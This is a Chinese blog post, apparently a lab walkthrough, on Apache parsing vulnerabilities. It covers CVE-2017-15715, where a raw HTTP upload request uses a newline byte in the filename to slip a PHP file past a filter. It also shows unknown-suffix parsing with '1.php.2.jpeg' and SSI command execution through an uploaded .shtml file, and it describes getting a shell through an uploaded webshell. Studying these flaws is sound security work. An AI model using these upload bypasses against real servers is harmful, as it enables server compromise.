Apache解析漏洞

最新推荐文章于 2024-06-04 10:03:12 发布
最新推荐文章于 2024-06-04 10:03:12 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 学习 文章标签: Apache解析漏洞

cve-2017-15715
1.通过POST请求构造一个文件上传,上传的文件名为:nz.php
在这里插入图片描述
一个上传文件的表单构造
POST / HTTP/1.1
Host: 192.168.199.151
Content-Length: 227
Cache-Control: max-age=0
Origin: http://192.168.199.151
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0haARlGnBy4wXjCT
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.199.151/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundary0haARlGnBy4wXjCT
Content-Disposition: form-data; name=“file_upload”; filename=“phpinfo.php”
Content-Type: application/octet-stream

<?php phpinfo(); ?>

------WebKitFormBoundary0haARlGnBy4wXjCT–

2.这时,发送请求会给你一个bad file;什么意思呢?我们所构造的php文件被拦截下来了。那么该如何绕过拦截呢?通过%0A截断绕过。
在这里插入图片描述
3.POST请求完成后,再通过GET请求请求你所构造的页面。发现我们所构造的PHP被成功解析执行。
在这里插入图片描述
那么我们就可构造恶意的php木马进行攻击 ,这里就不演示了。

apache httpd 未知后缀解析漏洞

当apache遇到无法识别解析的文件后缀时,会向前解析,所以我们只需要将木马的后缀改为.jpeg即可。这里我的木马名为1.php.2.jpeg。
在这里插入图片描述
同样,这里也可以构造php木马。

Apache SSI 远程命令执行漏洞

通过构造POST请求提交nz.shtml
在这里插入图片描述
访问http://192.168.199.151:8080/nz.shtml,发现命令已成功执行。
在这里插入图片描述
这里还可以通过http://192.168.199.151:8080/upload.php上传一句话木马xiaoma.php3
然后通过蚁剑连接上传大马,即可拿到shell。

宁紫
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache文件解析漏洞-01
09-15
Apache文件解析漏洞-01 Apache文件解析漏洞是一种基于Apache服务器的文件解析机制中的漏洞,攻击者可以通过构造特殊的文件名来欺骗Apache服务器,导致服务器错误地解析文件类型,从而导致安全漏洞的出现。 Apache...
Apache HTTPD 未知后缀解析漏洞
浅笑996的博客
11-24 1507
环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 该环境版本: PHP 7.x 最新版 Apache HTTPD 2.4.10 稳定版(来自debian源) 由此可知,该漏洞Apache、php版本无关,属于用户配置不当造成的解析漏洞。 开启环境: cd vulhub-master/httpd/apache_parsi...
Apache HTTPD 多后缀解析漏洞 漏洞复现
ADummy的博客
02-21 644
Apache HTTPD 多后缀解析漏洞 by ADummy 0x00利用路线 ​ 上传php文件—>Burpsuite抓包改包—>php文件上传成功—>getshell 0x01漏洞介绍 ​ 影响版本Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn ​ 其给.html后缀增加了media-type,值为text/html;给.cn后缀增
中间件解析漏洞Apache解析漏洞原理和复现
最新发布
A526847的博客
06-04 1227
在windows下,会直接根据最后的.来进 行分隔,将其判定为doc文件,但在apache中可不是这样的,apache会从后往前依次进行判别,遇到不 认识的后缀,便会往前读,如果还是不认识再往前,若是到最后一个都不认识,则会将该文件当成默认 类型文件读取。在2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,shell.php\x0A将被按照PHP后缀进行解析, 导致绕过一些服务器的安全策略。这种情况,多后缀的文件名中只要存在.php后缀,则就会将该文件当做php文件解析
Apache文件解析漏洞详解
永远是少年
10-07 1469
今天继续给大家介绍渗透测试相关知识,本文主要内容是Apache文件解析漏洞详解。 一、漏洞简介 二、Vulhub漏洞环境启动 三、漏洞实战
Apache 文件解析漏洞SSRF漏洞原理介绍及代码
qq_49433473的博客
05-30 1250
Apache 文件解析漏洞 SSRF漏洞原理介绍及代码 1. Apache 环境简介 2. Apache 解析漏洞介绍 3. 解析漏洞利用演示 4.利用场景介绍 1. Apache 环境简介 ​ Apache 和 PHP 采用 module 的方式结合(Apache2.2) 2. Apache解析漏洞介绍 ​ Apache 认为一个文件夹可以拥有多个扩展名,哪怕没有文件名,也可以拥有多个扩展名。 Apache 认为应该从右边到左开始判断解析方法的。如果最右侧的拓展名为不可识
Apache后缀名解析漏洞分析和防御方法
09-15
主要介绍了Apache后缀名解析漏洞分析和防御方法,后缀解析漏洞通常通过伪造PHP后辍,来上传文件到服务器中,很致命的一漏洞,需要的朋友可以参考下
IIS漏洞解析
10-15
### IIS漏洞解析 #### IIS 6.0 文件扩展名处理漏洞 IIS 6.0 是一款由微软发布的Internet Information Services (IIS)版本,在早期的Windows Server系统中广泛使用。此版本存在一个关于文件扩展名处理的安全漏洞...
Apache Tomcat v8.0.43
12-01
- 安全性更新:修复了一些已知的安全漏洞,增强了服务器的安全性。 - 性能改进:可能包含对性能的优化,如更快的响应时间或更低的内存占用。 - 兼容性增强:可能提升了与Java版本或其他软件的兼容性。 在下载的...
Apache2.4.23--解析漏洞
willow_liang的博客
10-21 5074
复现环境: Apache文件解析漏洞与用户的配置有密切关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到一个解析文件的特性。Apache默认- -个文件可以有多个以点分隔的后缀,当右边的后缀无法识别,则继续向左识别,发现后缀是;php,交给php处理这个文件。 如下图中的shell.php.001。最后的001后缀无法识别,就向左进行识别,发现Php,就会解析成为php文件 漏洞修复: 在httpd.conf或httpd-vhosts.conf中加入以下语句,从而禁止文件名格式为*.php
Apache两个解析漏洞复现及防御方法
阿道夫的博客
01-28 3313
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
【Web安全】文件上传漏洞
RexHa的博客
12-04 3617
目录1. 文件上传漏洞概述1.1 FCKEditor文件上传漏洞1.2 绕过文件上传检查功能2. 功能还是漏洞2.1 Apache文件解析2.2 IIS文件解析2.3 PHP CGI路径解析2.4 利用上传文件钓鱼 3. 设计安全的文件上传功能文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力。应用:例如上传一张图片、分享一段视频、论坛发帖时附带附件、发邮件时附带附件……文件上传后导致的安全问题一般有:FCKEditor是一款非常流行的富文本编辑器,其上传文件的功能能
描述apache和iis文件解析漏洞的原理,以及如何修复apache文件解析漏洞和iis解析漏洞
weixin_57108799的博客
02-26 570
apache与iis文件解析漏洞原理
Apache与文件解析漏洞详解
nuanyangH的博客
04-22 1904
1. Apache介绍与服务搭建 1.1. apache介绍 Apache跨平台的纯粹的web服务器,负责接收处理/响应http请求,之所以说它是纯粹的web服务器,是因为apache对于html页面的解析能力很强,但是不能解析嵌入页面内的服务器端脚本代码(如jsp/servlet)。 前面也说了,apache没有办法解析服务器端的脚本代码(此处以php为例),若需要解析.php文件,还需要php...
Apache解析漏洞学习笔记
weixin_52034407的博客
03-19 252
Apache解析漏洞简单介绍
apache rewrite支持post数据
mengzuchao的专栏
06-06 2086
&lt;IfModule mod_rewrite.c&gt;    Options +FollowSymlinks    RewriteEngine On    # 包含api及media    RewriteCond %{REQUEST_FILENAME} "(api\.php|media\.php|Public)"    RewriteRule ^(.*)$ http://www.17byh....
Apache文件解析漏洞影响版本
07-10
Apache文件解析漏洞(也被称为Apache Content Negotiation漏洞)影响的版本是Apache HTTP Server 2.4.49之前的版本。这个漏洞可能导致攻击者通过发送特制的请求来绕过文件扩展名检查,访问服务器上的敏感文件。建议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值